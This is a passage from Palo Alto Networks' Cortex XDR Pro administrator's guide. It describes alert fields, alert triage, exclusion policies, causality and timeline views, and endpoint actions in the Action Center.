OS PARENT CREATED BY Name of the parent operating system that created the
alert.

OS PARENT CMD Command-line used to by the parent operating

system to initiate the process including any
arguments.

OS PARENT SIGNATURE Signing status of the operating system of the activity:

• Unsigned
• Signed
• Invalid Signature
• Unknown

OS PARENT SIGNER Parent operating system signer.

OS PARENT SH256 Parent operating system SHA256 hash value.

OS PARENT ID Parent operating system ID.

OS PARENT PID OS parent process ID.

OS PARENT TID OS parent thread ID.

OS PARENT USER NAME Name of the user associated with the parent
operating system.

PROCESS EXECUTION SIGNATURE Signature status of the process that triggered the
alert:
• Unsigned
• Signed
• Invalid Signature
• Unknown

PROCESS EXECUTION SIGNER Signer of the process that triggered the alert.

REGISTRY DATA If the alert triggered on registry modifications (the

Event Type is Registry) this is the registry data that
triggered the alert. If not, then N/A.

REGISTRY FULL KEY If the alert triggered on registry modifications (the

Event Type is Registry) this is the full registry key that
triggered the alert. If not, then N/A.

REMOTE HOST If the alert triggered on network activity (the Event

Type is Network Connection) this is the the remote
host name that triggered the alert. If not, then N/A.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 249

© 2020 Palo Alto Networks, Inc.
 Field Description

REMOTE IP The remote IP address of a network operation that

triggered the alert.

REMOTE PORT The remote port of a network operation that triggered

the alert.

RULE ID The ID that matches the rule that triggered the alert.

SEVERITY The severity that was assigned to this alert when

it was triggered (or modified): Informational, Low,
Medium, High, or Unknown. For BIOC and IOCs, you
define the severity when you create the rule. Insights
are low and informational severity alerts that do not
raise incidents, but provide additional details when
investigating an event.

STARRED Whether the alert is starred by starring configuration.

SOURCE ZONE NAME The source zone name of the connection for firewall
alerts.

TARGET FILE SHA256 The SHA256 hash vale of an external DLL file that
triggered the alert.

TARGET PROCESS CMD The command-line of the process whose creation

triggered the alert.

TARGET PROCESS NAME The name of the process whose creation triggered the
alert.

TARGET PROCESS SHA256 The SHA256 value of the process whose creation
triggered the alert.

TIMESTAMP The date and time when the alert was triggered.
Right-click to Show rows 30 days prior or 30 days
after the selected timestamp field value.

URL The URL destination address of the domain triggering

the firewall alert.

USER NAME The name of the user that initiated the behavior
that triggered the alert. If the user is a domain user
account, this field also identifies the domain.

XFF X-Forwarded-For value from the HTTP header of the

IP address connecting with a proxy.

From the Alerts page, you can also perform additional actions to manage alerts and pivot on specific alerts
for deeper understanding of the cause of the event.
• Manage Alerts

250 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • Causality View
• Timeline View
• Analytics Alert View

Triage Alerts
When the Cortex XDR app displays a new alert on the Alerts page, use the following steps to investigate
and triage the alert:

STEP 1 | Review the data shown in the alert such as the command-line arguments (CMD), process info,
etc.
For more information about the alert fields, see Cortex XDR Alerts.

STEP 2 | Analyze the chain of execution in the Causality View.

When the app correlates an alert with additional endpoint data, the Alerts table displays a green dot
to the left of the alert row to indicate the alert is eligible for analysis in the Causality View. If the alert
has a gray dot, the alert is not eligible for analysis in the Causality View. This can occur when there is no
data collected for an event, or the app has not yet finished processing the EDR data. To view the reason
analysis is not available, hover over the gray dot.

STEP 3 | Review the Timeline View of review the sequence of events over time.
The timeline is available for alerts that have been stitched with endpoint data.

STEP 4 | If deemed malicious, consider responding by isolating the endpoint from the network.

STEP 5 | Remediate the endpoint and return the endpoint from isolation.

STEP 6 | Inspect the information again to identify any behavioral details that you can use to Create a
BIOC Rule.
If you can create a BIOC rule, test and tune the logic for the rule, and then save it.

Manage Alerts
From the Alerts page, you can manage the alerts you see and the information Cortex XDR displays about
each alert.

• Copy Alerts
• Analyze an Alert
• Create Profile Exceptions

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 251

© 2020 Palo Alto Networks, Inc.
 • Create a Featured Alert Field
• View Generating BIOC or IOC Rule
• Retrieve Additional Alert Details
• Add an Alert Exclusion Policy
• Forward Alerts to an External Service

Copy Alerts
You can copy an alert into memory as follows:
• Copy the URL of the alert record
• Copy the value for an alert field
• Copy the entire row of alert record
With either option, you can paste the contents of memory into an email to send. This is helpful if you need
to share or discuss a specific alert with someone. If you copy a field value, you can also easily paste it into a
search or begin a query.

• Create a URL for an alert record:

1. From the Alerts page, right-click the alert you want to send.
2. Select Copy alert URL.
Cortex XDR saves the URL to memory.
3. Paste the URL into an email or use as needed to share the alert.

• Copy a field value in an alert record:

1. From the Alerts page, right-click the field in the alert that you want to copy.
2. Select Copy text to clipboard.
Cortex XDR saves the field contents to memory.
3. Paste the value into an email or use as needed to share information from the alert.

• Copy the entire row of alert record

1. From the Alerts page, right-click on one or more alerts you want to copy.
2. Select Copy entire row(s).
3. Paste the value into an email or use as needed to share information from the alert.

Analyze an Alert
To help you understand the full context of an alert, Cortex XDR provides a powerful analysis view that
empowers you to make a thorough analysis very quickly.
The Causality View is available for XDR agent alerts that are based on endpoint data and for alerts raised on
network traffic logs that have been stitched with endpoint data.
To view the analysis:

STEP 1 | From the Alerts page, locate the alert you want to analyze.

STEP 2 | Right-click anywhere in the alert, and select Investigate Causality Chain.

STEP 3 | Choose whether to open the Causality View card for an alert in a new tab or the same tab.
You can also view the causality chain over time using the Timeline view.

252 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 4 | Review the chain of execution and available data for the process and, if available, navigate
through the processes tree.

Create Profile Exceptions

For XDR Agent alerts, you can create profile exceptions for Window processes, BTP, and JAVA
deserialization alerts directly from the Alerts table.

STEP 1 | Right-click an XDR Agent alert which has a category of Exploit and Create alert exception.

STEP 2 | Select an Exception Scope:

• Global—Apply the exception across your organization.
• Profile—Apply the exception to an existing profile or click and enter a Profile Name to create a new
profile.

STEP 3 | Add the scope.

STEP 4 | (Optional) View your profile exceptions.

1. Navigate to Endpoints > Policy Management > Profiles.
2. In the Profiles table, locate the OS in which you created your global or profile exception and right-
click to view or edit the exception properties.

Create a Featured Alert Field

To better highlight alerts that are significant to you, Cortex XDR enables you to label specific alert attributes
as Featured Alert Fields. Featured alert fields help you track in the Alerts Table alerts that involve a specific
host names, user names, and IP addresses.

STEP 1 | Navigate to Investigation > Incident Management > Featured Fields and select a type of
featured field:
• Hosts
• Users
• IP Addresses
• Active Directory

STEP 2 | In the field type table, Add featured Field Name to define a list of alert fields you want flagged
in the Alerts Table. You can either Create New featured alert field from scratch or Upload from
File.
• To create a new alert field:
1. Enter one or more field values and Add to the list.
2. (Optional) Add a comment.
3. Add the featured alert field.
• To import fields:
1. Browse or Drag and Drop your CSV file of field values. Download example file to ensure you using
the correct format.
2. Import your file.

STEP 3 | (Optional) Manage your featured alert field list.

• Locate the alert field you want to edit or delete.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 253

© 2020 Palo Alto Networks, Inc.
 • Right-click and Edit Field Name to modify the field definition, or Delete Field Name to remove the
featured flag.

STEP 4 | Investigate alerts that contain the featured alert fields.

• Navigate to the Alerts Table.
• In the Alerts table, sort according to the following fields:
• Contains Featured Host
• Contains Featured User
• Contains Featured IP Address
• In the Alert Name field, Cortex XDR displays alerts that contain a matching featured field value with a
flag.

Featured Active Directory values are displayed in the User and Host fields accordingly.

• (Optional) Create an incident scoring rule using the Alert table Contains Featured Field Name fields
to further highlight and prioritize alerts containing the Host, User, and IP address attributes.

View Generating BIOC or IOC Rule

Easily view the BIOC or IOC rules that generated alerts directly from the Alerts table.

STEP 1 | From the Alerts page, locate alerts with Alert Sources: XDR BIOC and XDR IOC.

STEP 2 | Right-click the row, and select View generating rule.

Cortex XDR opens the BIOC rule that generated the alert in the BIOC Rules page. If the rule has been
deleted, an empty table is displayed.

STEP 3 | Review the rule, if necessary, right-click to perform available actions.

Retrieve Additional Alert Details

To easily access additional information relating to an alert:

STEP 1 | From the Alerts page, locate the alert for which you want to retrieve information.

STEP 2 | Right-click anywhere in the alert, and select one of the following options:
• Retrieve alert data—Cortex XDR can provide additional analysis of the memory contents when an
exploit protection module raises an XDR Alert. To perform the analysis you must first retrieve alert
data consisting of the memory contents at the time the alert was raised. This can be done manually
for a specific alert, or you can enable Cortex XDR to automatically retrieve alert data for every
relevant XDR Alert. After Cortex XDR receives the data and performs the analysis, it issues a verdict
for the alert. You can monitor the retrieval and analysis progress from the Action Center (pivot to
view Additional data). When analysis is complete, Cortex XDR displays the verdict in the Advanced
Analysis field.
• Retrieve related files—To further examine files that are involved in an alert, you can request the
Cortex XDR agent send them to the Cortex XDR management console. If multiple files are involved,
Cortex XDR supports up to 20 files and 200MB in total size. The agent collects all requested files into
one archive and includes a log in JSON format containing additional status information. When the
files are successfully uploaded, you can download them from the Action Center for up to one week.
• View full endpoint details—Jump to a filtered view of the Endpoint Administration page by endpoint
ID. This unique ID is assigned by the Cortex XDR agent to identify the endpoint.

254 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • For PAN NGFW source type alerts, Download triggering packet—Download the session PCAP
containing the first 100 bytes of the triggering packet directly from Cortex XDR. To access the PCAP,
you can download the file from the Alerts table, Incident, or Causality view.

STEP 3 | Navigate to Response > Action Center to view retrieval status.

Alert Exclusions
The Investigation > Incident Management > Exclusions page displays all alert exclusion policies in Cortex
XDR.

An alert exclusion is a policy that contains a set of alert match criteria that you want to suppress from
Cortex XDR. You can Add an Alert Exclusion Policy from scratch or you can base the exclusion off of alerts
that you investigate in an incident. After you create an exclusion policy, Cortex XDR hides any future alerts
that match the criteria from incidents and search query results. If you choose to apply the policy to historic
results as well as future alerts, the app identifies any historic alerts as grayed out.
The following table describes both the default fields and additional optional fields that you can add to the
alert exclusions table and lists the fields in alphabetical order.

Field Description

Check box to select one or more alert exclusions on which you want to
perform actions.

BACKWARD SCAN Exclusion policy status for historic data, either enabled if you want to apply
STATUS the policy to previous alerts or disabled if you don’t want to apply the policy to
previous alerts.

COMMENT Administrator-provided comment that identifies the purpose or reason for the
exclusion policy.

DESCRIPTION Text summary of the policy that displays the match criteria.

MODIFICATION Date and time when the exclusion policy was created or modified.
DATE

NAME Descriptive name provided to identify the exclusion policy.

POLICY ID Unique ID assigned to the exclusion policy.

STATUS Exclusion policy status, either enabled or disabled.

USER User that last modified the exclusion policy.

USER EMAIL Email associated with the administrative user.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 255

© 2020 Palo Alto Networks, Inc.
Add an Alert Exclusion Policy
Through the process of triaging alerts or resolving an incident, you may determine a specific alert does
not indicate a threat. If you do not want Cortex XDR to display alerts that match certain criteria, you can
create an alert exclusion policy. After you create an exclusion policy, Cortex XDR hides any future alerts
that match the criteria, and excludes the alerts from incidents and search query results. If you choose to
apply the policy to historic results as well as future alerts, the app identifies any historic alerts as grayed out.

If an incident contains only alerts with exclusions, Cortex XDR changes the incident status to
Resolved - False Positive and sends an email notification to the incident assignee (if
set).

There are two ways to create an exclusion policy. You can define the exclusion criteria when you
investigate an incident or you can create an alert exclusion from scratch.
• Build an Alert Exclusion Policy from Alerts in an Incident
• Build an Alert Exclusion Policy from Scratch
Build an Alert Exclusion Policy from Alerts in an Incident
If after reviewing the incident details, if you want to suppress one or more alerts from appearing in the
future, create an exclusion policy based on the alerts in the incident. When you create an incident from the
incident view, you can define the criteria based on the alerts in the incident. If desired, you can also Create
Alert Exclusions from scratch.

STEP 1 | From the Incident view in Cortex XDR, select Actions > Create Exclusion.

STEP 2 | Enter a POLICY NAME to identify your alert exclusion.

STEP 3 | Enter a descriptive COMMENT that identifies the reason or purpose of the alert exclusion
policy.

STEP 4 | Use the alert filters to add any the match criteria for the alert exclusion policy.
You can also right-click a specific value in the alert to add it as match criteria. The app refreshes to show
you which alerts in the incident would be excluded. To see all matching alerts including those not related
to the incident, clear the option to Show only alerts in the named incident.

STEP 5 | Create the exclusion policy and confirm the action.

If you later need to make changes, you can view, modify, or delete the exclusion policy from the
Investigation > Incident Management > Exclusions page.

256 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Build an Alert Exclusion Policy from Scratch

STEP 1 | Select Investigation > Incident Management > Exclusions.

STEP 2 | Select + Add Exclusion.

STEP 3 | Enter a Policy Name to identify the exclusion policy.

STEP 4 | Enter any comments to explain the purpose or intent behind the policy.

STEP 5 | Define the exclusion criteria.

Use either the filters at the top to build your exclusion criteria. Or, to use existing alert values to
populate your exclusion criteria, right click the value, and select Add rows with <value> to policy.
As you define the criteria, the app filters the results to display matches.

STEP 6 | Review the results.

The alerts in the table will be excluded from appearing in the app after the policy is created and
optionally, any existing alert matches will be grayed out.

This action is irreversible: All historic excluded alerts will remain excluded if you disable or
delete the policy.

STEP 7 | Create and then select Yes to confirm the alert exception policy.

Causality View
The Causality View provides a powerful way to analyze and respond to alerts. The scope of the Causality
View is the Causality Instance (CI) to which this alert pertains. The Causality View presents the alert
(generated by Cortex XDR or sent to Cortex XDR from a supported alert source such as the Cortex XDR
agent) and includes the entire process execution chain that led up to the alert. On each node in the CI chain,
Cortex XDR provides information to help you understand what happened around the alert.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 257

© 2020 Palo Alto Networks, Inc.
 The Causality View comprises five sections:

Context
Summarizes information about the alert you are analyzing, including the host name, the process name on
which the alert was raised, and the host IP and MAC address . For alerts raised on endpoint data or activity,
this section also displays the endpoint connectivity status and operating system.

Causality Instance Chain

Includes the graphical representation of the Causality Instance (CI) along with other information and
capabilities to enable you to conduct your analysis.
The Causality View presents a single CI chain. The CI chain is built from processes nodes, events, and alerts.
The chain presents the process execution and might also include events that these processes caused and
alerts that were triggered on the events or processes. The Causality Group Owner (CGO) is displayed on
the left side of the chain. The CGO is the process that is responsible for all the other processes, events and
alerts in the chain. You need the entire CI to fully understand why the alert occurred.
The Causality View provides an interactive way to view the CI chain for an alert. You can move it, extend it,
and modify it. To adjust the appearance of the CI chain, you can enlarge/shrink the chain for easy viewing
using the size controls on the right. You can also move the chain around by selecting and dragging it. To
return the chain to its original position and size, click in the lower-right of the CI graph.
The process node displays icons to indicate when an RPC protocol or code injection event were executed
on another process from either a local or remote host.
•
Injected Node
•
Remote IP address

258 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Hover over a process node to display a Process Information pop-up listing useful information about the
process. If available, the pop-up includes the process Analytics Profiles.

• Path of the process.

• Command line of the process.
• SHA256 value of the process.
• Username of the user that initiated the process.
• Signature associated with the process, if available.
• WildFire verdict, if available.
• Running time of the process.
From any process node, you can also right-click to display additional actions that you can perform during
your investigation:
• Show parents and children—If the parent is not presented by default, you can display it. If the process
has children, XDR app displays the number of children beneath the process name and allows you to
display them for additional information.
• Hide branch—Hide a branch from the Causality View.
• Add to block list or allow list, terminate, or quarantine a process—If after investigating the activity in
the CI chain, you want to take action on the process, you can select the desired action to allow or block
process across your organization.
In the causality view of a Detection (Post Detected) type alert, you can also Terminate process by hash.
• Depending on the type of node—file, process, or IP address—open the artifact view:
• Open Hash View to display detailed information about the files and processes relating to the hash.
• Open IP View to display detailed information about the IP address.
• Initiate a remediation analysis.

Entity Data
Provides additional information about the entity that you selected. The data varies by the type of entity
but typically identifies information about the entity related to the cause of the alert and the circumstances
under which the alert occurred.
For example, device type, device information, remote IP address.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 259

© 2020 Palo Alto Networks, Inc.
 When you investigate command-line arguments, click {***} to obfuscate or decode the base64-encoded
string.
For continued investigation, you can copy the entire entity data summary to the clipboard.

Response Actions
You can choose to isolate the host, on which the alert was triggered, from the network or initiate a live
terminal session to the host to continue investigation and remediation.

Events Table
Displays up to 100,000 related events for the process node which matches the alert criteria that were not
triggered in the alert table but are informational.
You can also export the table results to a tab-separated values (TSV) file. Right-click to Show rows 30 days
prior or 30 days after the selected timestamp field value.
For the Behavioral Threat Protection table, right-click to add to allow list or block list, terminate, and
quarantine a process.

To view statistics for files on VirusTotal, you can pivot from the Initiator MD5 or SHA256
value of the file on the Files tab.

Network Causality View

The Network Causality View provides a powerful way to analyze and respond to the stitched firewall and
endpoint alerts. The scope of the Causality View is the Causality Instance (CI) to which this alert pertains.
The Causality View presents the network processes that triggered the alert, generated by Cortex XDR, Palo
Alto Networks next-generation firewalls, and supported alert source such as the Cortex XDR agent.
The network causality view includes the entire process execution chain that led up to the alert. On each
node in the CI chain, Cortex XDR provides information to help you understand what happened around the
alert.

260 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
The CI chain visualizes the firewall logs, endpoint files, and network connections that triggered alerts
connected to a security event.

The network causality view displays only the information it collects from the detectors. It is
possible that the CI may not show some of the firewall or agent processes.

The Network Causality View comprises five sections:

Section Description

Context Summarizes information about the alert you are

analyzing, including the host name, the process name on
which the alert was raised, and the host IP address. For
alerts raised on endpoint data or activity, this section also
displays the endpoint connectivity status and operating
system.

Host Isolation You can choose to isolate the host, on which the
alert was triggered, from the network or initiate a live
terminal session to the host to continue investigation and
remediation.

CI Chain Includes the graphical representation of the Causality

Instance (CI) along with other information and
capabilities to enable you to conduct your analysis.
The Causality View presents a CI chain for each of the
processes and the network connection. The CI chain is
built from processes nodes, events, and alerts. The chain
presents the process execution and might also include
events that these processes caused and alerts that were

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 261

© 2020 Palo Alto Networks, Inc.
 Section Description
triggered on the events or processes. The Causality
Group Owner (CGO) is displayed on the left side of the
chain. The CGO is the process that is responsible for
all the other processes, events and alerts in the chain.
You need the entire CI to fully understand why the alert
occurred.
The Causality View provides an interactive way to view
the CI chain for an alert. You can move it, extend it, and
modify it. To adjust the appearance of the CI chain, you
can enlarge/shrink the chain for easy viewing using the
size controls on the right. You can also move the chain
around by selecting and dragging it. To return the chain
to its original position and size, click in the lower-right
of the CI graph.
From any process node, you can also right-click to display
additional actions that you can perform during your
investigation:
• Show parents and children—If the parent is not
presented by default, you can display it. If the process
has children, XDR app displays the number of children
beneath the process name and allows you to display
them for additional information.
• Hide branch—Hide a branch from the Causality View.
• Add to block list or allow list, terminate, or
quarantine a process—If after investigating the
activity in the CI chain, you want to take action on
the process, you can select the desired action on the
process across your organization.
In the causality view of a Detection (Post Detected)
type alert, you can also Terminate process by hash.
When selecting the Network Appliance node in the
Network Causality View, the event timestamp is now
displayed in the Entity Data section of the card.
The color of a process node also correlates to the
WildFire verdict.
• Blue—Benign.
• Yellow—Grayware.
• Red—Malware.
• Light gray—Unknown verdict.
• Dark gray—The verdict is inconclusive.
To view and download the WildFire report, in the
Entity Data section, click .

Entity Data Provides additional information about the entity that

you selected. The data varies by the type of entity but
typically identifies information about the entity related to

262 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Section Description
the cause of the alert and the circumstances under which
the alert occurred.

Events Table Displays all related events for the process node which
matches the alert criteria that were not triggered in the
alert table but are informational. You can also export the
table results to a tab-separated values (TSV) file.
For the Behavioral Threat Protection table, right-click to
add to allow list or block list, terminate, and quarantine a
process.

To view statistics for files on VirusTotal,

you can pivot from the Initiator MD5 or
SHA256 value of the file on the Files tab.

Timeline View
The Timeline provides a forensic timeline of the sequence of events, alerts, and informational BIOCs
involved in an attack. While the Causality View of an alert surfaces related events and processes that
Cortex XDR identifies as important or interesting, the Timeline displays all related events, alerts, and
informational BIOCs over time.

Cortex XDR presents the Timeline in four parts:

Section Description

CGO (and process instances Cortex XDR displays the Causality Group Owner (CGO) and the host
that are part of the CGO) on which the CGO ran in the top left of the timeline. The CGO is the
parent process in the execution chain that Cortex XDR identified as
being responsible for initiating the process tree. In the example above,

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 263

© 2020 Palo Alto Networks, Inc.
 Section Description
wscript.exe is the CGO and the host it ran on was HOST488497.
You can also click the blue corner of the CGO to view and filter related
processes from the Timeline. This will add or remove the process and
related events or alerts associated with the process from the Timeline.

Timespan By default, Cortex XDR displays a 24-hour period from the start of the
investigation and displays the start and end time of the CGO at either
end of the timescale. You can move the slide bar to the left or right to
focus on any time-gap within the timescale. You can also use the time
filters above the table to focus on set time periods.

Activity Depending on the type of activities involved in the CI chain of events,

the activity section can present any of the following three lanes across
the page:
• Alerts—The alert icon indicates when the alert occurred.
• BIOCs—The category of the alert is displayed on the left (for
example: tampering or lateral movement). Each BIOC event also
indicates a color associated with the alert severity. An informational
severity can indicate something interesting has happened but there
weren’t any triggered alerts. These events are likely benign but are
byproducts of the actual issue.
• Event information—The event types include process execution,
outgoing or incoming connections, failed connections, data upload,
and data download. Process execution and connections are indicated
by a dot. One dot indicates one connection while many dots
indicates multiple connections. Uploads and Downloads are indicated
by a bar graph that shows the size of the upload and download.
The lanes depict when activity occurred and provide additional statistics
that can help you investigate. For BIOC and Alerts, the lanes also depict
activity nodes—highlighted with their severity color: high (red), medium
(yellow), low (blue), or informational (gray)—and provide additional
information about the activity when you hover over the node.

Related events, alerts, and Cortex XDR displays up to 100,000 alerts, BIOCs (triggered and
informational BIOCs informational), and events. Click on a node in the activity area of the
Timeline to filter the results you see here. Similar to other pages in
Cortex XDR, you can create filters to search for specific events.

Analytics Alert View

The analytics alert view provides a detailed summary of the behavior that triggered an Analytics or Analytics
BIOC alert. This view also provides a visual depiction of the behavior and additional information you can use
to assess the alert. This includes the endpoint on which the activity was initiated, the user that performed
the action, the technique the analytics engine observed, and activity and interactions with other hosts inside
or outside of your network.

264 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Figure 1: Analytics View of an Analytics Alert

Section Description

1. Context For Analytics alerts, the analytics view indicates the endpoint for which the
alert was raised.
For Analytics BIOC alerts, the Analytics view summarizes information about
the alert, including the source host name, IP address, the process name on
which the alert was raised, and the corresponding process ID.

2. Alert summary (Analytics alerts only) Describes the behavior that triggered the alert and
activity impact.

3. Graphic summary Similar to the Causality View, the analytics view provides a graphic
representation of the activity that triggered the alert and an interactive way
to view the chain of behavior for an Analytics alert. You can move the graphic,
extend it, and modify it. To adjust the appearance, you can enlarge/shrink
the chain for easy viewing using the size controls on the right. You can also
move the chain around by selecting and dragging it. To return the chain to its
original position and size, click in the lower-right of the graph.
The activity depicted in the graphic varies depending on the type of alert:
• Analytics alerts—You can view a summary of the aggregated activity
including the source host, the anomalous activity, connection count, and
the destination host. You can also select the host to view any relevant
profile information.
• Analytics BIOC alerts—You can view the specific event behavior including
the causality group owner that initiated the activity and related process
nodes. To view the summary of the specific event, you can select the
above the process node.
Right-click on the following nodes to view additional information:
• Device—Open in IP View

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 265

© 2020 Palo Alto Networks, Inc.
 Section Description
• Process—View Process Instances
• IP Address—Add to EDL

4. Alert description The alert description provides details and statistics related to the activity.
Beneath the description, you can also view the alert name, severity assigned
to the alert, time of the activity, alert tactic (category) and type, and links to
the MITRE summary of the attack tactic.

5. Events table Displays events related to the alert.

6. Response actions Actions you can take in response to an Analytics alert. These actions can
include isolating a host from the network, initiating a live terminal session, and
adding an IP address or domain name to an external dynamic list (EDL) that is
enforceable in your Palo Alto Networks firewall security policy.

266 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Investigate Endpoints
Endpoint investigation requires either a Cortex XDR Prevent or a Cortex XDR Pro per
Endpoint license.

• Action Center
• View Details About an Endpoint
• Retrieve Files from an Endpoint
• Retrieve Support Logs from an Endpoint
• Scan an Endpoint for Malware

Action Center
The Action Center provides a central location from which you can track the progress of all investigation,
response, and maintenance actions performed on your Cortex XDR-protected endpoints. The main All
Actions tab of the Action Center displays the most recent actions initiated in your deployment. To narrow
down the results, click Filter on the top right.
You can also jump to filtered Action Center views for the following actions:
• Quarantine—View details about quarantined files on your endpoints. You can also switch to an
Aggregated by SHA256 view that collapses results per file and lists the affected endpoints in the Scope
field.
• Block List/Allow List—View files that are permitted and blocked from running on your endpoints
regardless of file verdict.
• Scripts Library—View Palo Alto Networks and administrator-uploaded scripts that you can run on your
endpoints.
• Isolation—View the endpoints in your organization that have been isolated from the network. For more
information, refer to Isolate an Endpoint.
• External Dynamic List—View the list of IP addresses and domain names in your EDL. For more
information, refer to Manage External Dynamic Lists
• Endpoint Blocked IP Addresses—View remote IP addresses that the Cortex XDR agent has automatically
blocked from communicating with endpoints in your network. For more information, refer to Add a New
Malware Security Profile.
For actions that can take a while to complete, the Action Center tracks the action progress and displays the
action status and current progress description for each stage. For example, after initiating an agent upgrade
action, Cortex XDR monitors all stages from the Pending request until the action status is Completed.
Throughout the action lifetime, you can view the number of endpoints on which the action was successful
and the number of endpoints on which the action failed.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 267

© 2020 Palo Alto Networks, Inc.
 The following table describes both the default and additional optional fields that you can view from the All
Actions tab of the Action Center and lists the fields in alphabetical order.

Field Description

Action Type Type of action initiated on the endpoint (for example

Agent Upgrade).

Created By The name of the user who initiated the action.

Creation Timestamp Date and time the action was created.

Description Includes the action scope of affected endpoints and

additional data relevant for each of the specific actions,
such as agent version, file path, and file hash.

Expiration Date Time the action will expire. To set an expiration the action
must apply to one or more endpoints.
By default, Cortex XDR assigns a 30-day expiration limit
expiration limit to the following actions:
• Agent Uninstall
• Agent Upgrade
• Files Retrieval
• Isolate
• Cancel Endpoint Isolation
Additional actions such as malware scans, quarantine, and
endpoint data retrieval are assigned a 4-day expiration
limit.
After the expiration limit, the status for any remaining
Pending actions on endpoints change to Expired and
these endpoints will not perform the action.

Status The status the action is currently at:

• Pending—No endpoint has started to perform the
action yet.
• In Progress—At least one endpoint has started to
perform the action.
• Canceled—The action was canceled before any
endpoint has started performing it.
• Pending Abort—No endpoint has started to perform
the action yet.
• Aborted—The action was canceled for all endpoints
after at least one endpoint has started performing it.
• Expired—The action expired before any endpoint has
started performing it.
• Completed with Partial Success—The action was
completed on all endpoints. However, some endpoints
did not complete it successfully. Depending on the
action type, it may have failed, been canceled, expired,
or failed to retrieve all data.

268 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Field Description
• Completed Successfully—The action was completed
successfully on all endpoints.
• Failed—The action failed on all endpoints.
• Timeout—The action timed-out on all endpoints.

Additional data—If additional details are available for an action or for specific endpoints, you can pivot
(right-click) to the Additional data view. You can also export the additional data to a TSV file. The page
can include details in the following fields but varies depending on the type of action.

Endpoint Name Target host name of each endpoint for which an action
was initiated.

IP Addresses IP address associated with the endpoint.

Status Status of the action for the specific endpoint.

Action Last Update Time at which the last status update occurred for the
action.

Advanced Analysis For Retrieve alert data requests related to XDR Alerts
raised by exploit protection modules, Cortex XDR
can analyze the memory state for additional verdict
verification. This field displays the analysis progress and
resulting verdict.

Action Parameters Summary of the Action including the alert name and alert
ID.

Additional Data | Malicious Files Additional data, if any is available, for the action. For
malware scans, this field is titled Malicious Files and
indicates the number of malicious files identified during
the scan.

Manage Endpoint Actions

There are two ways you can initiate an endpoint action. You can Initiate an Endpoint Action from the
Action Center or you can initiate an action when you View Details About an Endpoint. Then, to monitor the
progress and status of an endpoint action, you can Monitor Endpoint Actions from the Action Center.
Initiate an Endpoint Action
You can create new administrative actions using the Action Center wizard in three easy steps:
1. Select the action type and configure its parameters.
2. Define the target agents for this action.
3. Review and confirm the action summary.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 269

© 2020 Palo Alto Networks, Inc.
STEP 1 | Log in to Cortex XDR.
Go to Response > Action Center > +New Action.

STEP 2 | Select the action you want to initiate and follow the required steps and parameters you need
to define for each action.
Cortex XDR displays only the endpoints eligible for the action you want to perform.

STEP 3 | Review the action summary.

Cortex XDR will inform you if any of the agents in your action scope will be skipped. Click Done.

STEP 4 | Track your action.

Track the new action in the Action Center. The action status is updated according to the action progress,
as listed in the table above.

Monitor Endpoint Actions

STEP 1 | Log in to Cortex XDR.

Go to Response > Action Center.

STEP 2 | Select the relevant view.

Use the left-side menu on the Action Center page to monitor the different actions according to their
type:

270 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 • All—Lists all the administrative actions that were created in your network, including time of creation,
action type and description, action status, the name of the user who initiated the action, and the
action expiration date, if it exists.
• Quarantine—Lists only actions initiated to quarantine files on endpoints, including the file hash, file
name, file path and scope of target agents included in this action.
• Block List/Allow List—Lists only actions initiated to block or allow files, including file hash, status and
any existing comments.

STEP 3 | Filter the results.

To further narrow the results, use the Filters menu on the top of the page.

STEP 4 | Take further actions.

After inspecting an action log, you may want to take further action. Right-click the action and select one
of the following (where applicable):
• View additional data—Display more relevant details for the action, such as file paths for quarantined
files or operating systems for agent upgrades.
• Cancel for Pending endpoints—Cancel the original action for agents that are still in Pending status.
• Download output—Download a zip file with the files received from the endpoint for actions such as
file and data retrieval.
• Rerun—Launch the Create new action wizard populated with the same details as the original action.
• Run on additional agents—Launch the action wizard populated with the details as the original action
except for the agents which you have to fill in.
• Restore—Restore quarantined files.

View Details About an Endpoint

The Endpoints > Endpoint Management > Endpoint Administration page provides a central location from
which you can view and manage the endpoints on which the Cortex XDR agent is installed. The right-click
pivot menu that is available for each endpoint displays the actions you can perform.

The following table describes the list of actions you can perform on your endpoints.

Field Action

Endpoint Control • Open in interactive mode

• Perform Heartbeat
• Change Endpoint Alias

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 271

© 2020 Palo Alto Networks, Inc.
 Field Action
• Upgrade Agent Version

You cannot upgrade VDI endpoints.

• Retrieve Support File

• Set Endpoint Proxy
